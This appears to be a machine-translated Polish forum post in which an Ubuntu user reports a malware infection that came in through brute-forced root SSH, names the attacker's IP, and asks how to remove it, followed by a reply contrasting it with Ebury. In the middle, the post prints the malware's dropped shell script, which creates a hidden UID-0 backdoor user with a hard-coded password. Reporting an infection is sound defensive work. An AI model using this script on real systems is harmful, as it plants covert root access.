Jestem całkiem pewien, że mój laptop z Ubuntu 13.10 jest zainfekowany jakimś złośliwym oprogramowaniem.
Co jakiś czas znajduję proces / lib / sshd (należący do roota), który działa i zużywa dużo procesora. To nie jest serwer sshd, na którym działa / usr / sbin / sshd.
Plik binarny ma uprawnienia --wxrw-rwt i generuje i spawnuje skrypty w katalogu / lib. Ostatni nosi nazwę 13959730401387633604 i wykonuje następujące czynności
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Użytkownik gusr został utworzony przez złośliwe oprogramowanie niezależnie, a następnie chpasswd zawiesza się, zużywając 100% procesora.
Do tej pory stwierdziłem, że użytkownik gusr został dodatkowo dodany do plików w / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Wygląda na to, że złośliwe oprogramowanie wykonało kopie wszystkich tych plików z przyrostkiem „-”. Pełna lista plików / etc / zmodyfikowanych przez root jest dostępna tutaj .
Ponadto plik / etc / hosts został zmieniony na ten .
/ Lib / sshd zaczyna się od dodania się na końcu pliku /etc/init.d/rc.local!
Usunąłem użytkownika, usunąłem pliki, zabiłem drzewo przetwarzanych, zmieniłem moje hasła i usunąłem klucze publiczne ssh.
Wiem, że jestem w zasadzie przykręcony i najprawdopodobniej ponownie zainstaluję cały system. Niemniej jednak, ponieważ loguję się na kilka innych komputerów, dobrze byłoby przynajmniej spróbować go usunąć i dowiedzieć się, jak go dostałem. Będziemy wdzięczni za wszelkie sugestie, jak to zrobić.
Wygląda na to, że weszli 25 marca, brutalnie wymuszając logowanie roota. Nie miałem pojęcia, że root ssh jest domyślnie włączony w Ubuntu. Wyłączyłem go i wystawiłem denyhosts.
Login pochodził z 59.188.247.236, najwyraźniej gdzieś w Hongkongu.
Mam laptopa z EmperorLinux i umożliwiły one dostęp do roota. Jeśli masz jedną z nich i korzystasz z sshd, uważaj.
Linux/Ebury
. To coś innego i prawdopodobnie nie ma przypisanej nazwy. Ebury nie utworzyłby nowego konta użytkownika i zmodyfikowałby bibliotekę współdzieloną używaną przez openssh, nie wprowadzając nowego pliku binarnego o nazwie sshd.